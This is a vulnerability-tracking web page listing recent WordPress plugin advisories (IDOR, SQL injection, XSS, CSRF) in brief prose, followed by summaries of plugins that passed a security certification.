Vulnerabilities and Security Researches

Recent vulnerability researches
CVE/PSC	Application	Date	Affected versions	Description
			Actual on: Jun 17, 2026, 05:06:48
CVE-2026-10780	Static Block vulnerable	Jun 17, 2026, 10:06:32	Min - Max 2.2	The Static Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2. This is due to the static_block_content() shortcode handler retrieving a post via get_post() using an attacker-supplied 'id' attribute and outputting its post_content without verifying the post's status (private, draft, pending) or the requesting user's capability to view it. This makes it possible for authenticated attackers, with contributor-level access and above, to read the...
CVE-2026-49080	wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin vulnerable	Jun 16, 2026, 22:06:17	Min - Max 7.4	wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin [wpdatatables] < 7.4 CVE-2026-49080
CVE-2026-49772	The Events Calendar vulnerable	Jun 16, 2026, 18:06:49	Min - Max 6.16.3	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Liquid Web / StellarWP The Events Calendar allows Blind SQL Injection. This issue affects The Events Calendar: from 6.15.12 through 6.16.2.
CVE-2026-2381	WooCommerce Stripe Payment Gateway vulnerable	Jun 16, 2026, 17:06:52	Min - Max 10.8.0	The WooCommerce Stripe Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_pay_for_order()` function in all versions up to, and including, 10.7.0 This is due to a missing order ownership or order_key verification when processing payment for an order via the `wc_stripe_pay_for_order` WC-AJAX endpoint. The function only validates a nonce (which is publicly available on any WooCommerce page where Express Checkout is enabled), bu...
753d31765913b4d2dbb8af0a5512e5f1f8c70c61	leenk.me vulnerable	Jun 16, 2026, 11:06:20	Min - Max 2.5.1	leenk.me [leenkme] < 2.5.1 (closed) WordPress leenk.me Plugin 2.5.0 - Multiple Vulnerabilities This WordPress leenk.me plugin is prone to cross-site request forgery and cross-site scripting vulnerabilities via vulnerable page: wp-content/plugins/leenkme/facebook.php. Also, there are vulnerable fields: "facebook_message", "facebook_description", "default_image", "facebook_linkname", etc. Upgrade the plugin.
5abd4657-8a58-4d97-b8cb-b67235ab5b8a	Social Hashtags vulnerable	Jun 16, 2026, 11:06:20	Min - Max 2.0.0	Social Hashtags [social-hashtags] <= 2.0.0 (unfixed) Social Hashtags 2.0.0 - New Post Title Field Stored XSS The Social Hashtags WordPress plugin was affected by a New Post Title Field Stored XSS security vulnerability.
1965c7b04565befbb11c28b56cb6922733a47b03	Social Hashtags vulnerable	Jun 16, 2026, 11:06:20	Min - Max 2.0.1	Social Hashtags [social-hashtags] < 2.0.1 WordPress Social Hashtags Plugin <= 2.0.0 is vulnerable to Cross Site Scripting (XSS) Update the plugin. Arsan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Social Hashtags Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.0.1.
a7cf6766582e354e702766a86f85716127d19bdc	Social Hashtags vulnerable	Jun 16, 2026, 11:06:20	Min - Max 3.0.0	Social Hashtags [social-hashtags] <= 3.0.0 (unfixed) Social Hashtags <= 3.0.0 - Cross-Site Scripting The Social Hashtags plugin for WordPress is vulnerable to Cross-Site Scripting via the new post title field in versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts that execute in a victim's browser.
e98a6264-9c5a-417f-b2f8-bd0017b411a0	Simple Calendar – Google Calendar Plugin vulnerable	Jun 16, 2026, 11:06:20	Min - Max 3.2.5	Simple Calendar – Google Calendar Plugin [google-calendar-events] < 3.2.5 Simple Calendar < 3.2.5 - Cross-Site Request Forgery via duplicate_feed The Simple Calendar – Google Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 3.2.5 (exclusive). This is due to missing or incorrect nonce validation on the duplicate_feed function. This makes it possible for unauthenticated attackers to duplicate feeds via a forged request granted they can t...
3d3bbf542efa380d1c9c1f006aff813662cd771e	Simple Calendar – Google Calendar Plugin vulnerable	Jun 16, 2026, 11:06:20	Min - Max 3.2.5	Simple Calendar – Google Calendar Plugin [google-calendar-events] < 3.2.5 Simple Calendar <= 3.2.4 - Cross-Site Request Forgery via duplicate_feed The Simple Calendar – Google Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 3.2.5 (exclusive). This is due to missing or incorrect nonce validation on the duplicate_feed function. This makes it possible for unauthenticated attackers to duplicate feeds via a forged request granted they can trick a s...

Recent approved applications
Application	Date	Description	Details
			Actual on: Jun 17, 2026, 05:06:48
Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode	May 26, 2026, 14:05:16	Coming soon and landing page builders sit at the intersection of front-end publishing, access control, template rendering, subscriber collection, SEO metadata, and administrator-managed design content. That makes them high-value from a marketing perspective, but also security-sensitive because builder content often becomes public HTML and mode controls can determine who can see the site. Website Builder by SeedProd version 6.20.1 has successfully completed the CleanTalk Plugin Security Certification process...
Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels	May 26, 2026, 14:05:15	Image import plugins bridge WordPress with external media providers, proxy services, remote image URLs, metadata processing, and the local Media Library. That workflow improves publishing speed, but it also expands the attack surface around remote downloads, MIME validation, alt text and caption handling, attribution metadata, and editor integrations. Instant Images version 7.1.1 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64662, confirming that the p...
Custom Fonts – Host Your Fonts Locally	May 26, 2026, 14:05:13	Typography plugins appear presentation-oriented, but their core workflows involve file uploads, local asset hosting, generated CSS, editor integration, and front-end output. That combination can become security-sensitive when font files, font names, CSS rules, and generated asset paths are accepted from administrators or imported from external providers. Custom Fonts version 2.1.17 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64660, confirming that the...
FluentSMTP – WP Mail SMTP, Amazon SES, SendGrid, MailGun and Any SMTP Connector Plugin	May 26, 2026, 14:05:11	SMTP and email routing plugins hold highly sensitive operational data because they connect WordPress to external mail infrastructure, API credentials, OAuth-based providers, email logs, and resend workflows. Weak controls in this layer can expose tokens, disclose private email content, alter transactional mail routing, or allow unauthorized users to resend messages. FluentSMTP version 2.2.95 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64658, confirmin...
SiteGuard WP Plugin	May 26, 2026, 14:05:10	Login hardening plugins operate directly on WordPress authentication, administration access, CAPTCHA behavior, lockout logic, and security notifications. That position gives them defensive value, but it also creates a high-impact attack surface: weak validation or unsafe configuration handling can cause lockout bypass, administrator denial of service, sensitive path disclosure, or unauthorized modification of protection rules. SiteGuard WP Plugin version 1.7.12 has successfully completed the CleanTalk Plugi...
Advanced Editor Tools	May 01, 2026, 14:05:56	Editor enhancement plugins operate directly on the boundary between content creation, rich-text formatting, block editor behavior, Classic Editor compatibility, and front-end rendering. These plugins influence how authors create content, how formatting is stored, how editor settings are applied, and how HTML produced by rich-text tools eventually appears on public pages. A weakness in this class of plugin can lead to stored XSS through editor content or settings, unauthorized configuration changes, unsafe h...
Really Simple SSL	May 01, 2026, 14:05:56	Security and SSL enforcement plugins operate across some of the most sensitive trust boundaries in WordPress because they can influence HTTPS migration, redirect behavior, security headers, login protection, two-factor authentication, vulnerability detection, and site hardening controls. Weaknesses in this class of plugin can affect confidentiality, session safety, authentication integrity, administrative access control, or the reliability of security configuration across the entire site. Really Simple Secu...
WP Booking Calendar	Apr 28, 2026, 17:04:40	Booking and reservation plugins operate across a sensitive boundary between public form submission, calendar availability, customer-provided booking data, admin-side reservation management, and in some configurations external calendar synchronization. These plugins often process names, contact details, selected dates, time slots, service requests, event information, and notification templates, while also controlling whether a date or resource can be booked. A weakness in this class of plugin can lead to sto...
UiCore Animate	Apr 28, 2026, 17:04:40	Animation and interaction plugins operate on a sensitive boundary between front-end rendering, visual builder controls, Gutenberg block behavior, Elementor widget configuration, and client-side JavaScript execution. These plugins often modify how content appears, moves, loads, transitions between pages, and reacts to scrolling or user interaction. A weakness in this class of plugin can lead to stored XSS through animation settings, unsafe rendering of visual effects, unauthorized modification of design beha...
YayMail – WooCommerce Email Customizer	Apr 28, 2026, 17:04:40	WooCommerce email customization plugins operate on a sensitive boundary between order data, customer communication, template rendering, and admin-side content editing. These plugins often process customer names, billing and shipping details, order metadata, payment-related labels, coupons, custom fields, and transactional email content. A weakness in this class of plugin can lead to stored XSS in email templates or admin previews, unauthorized modification of transactional communications, data leakage throu...

Recent vulnerability researches

Recent approved applications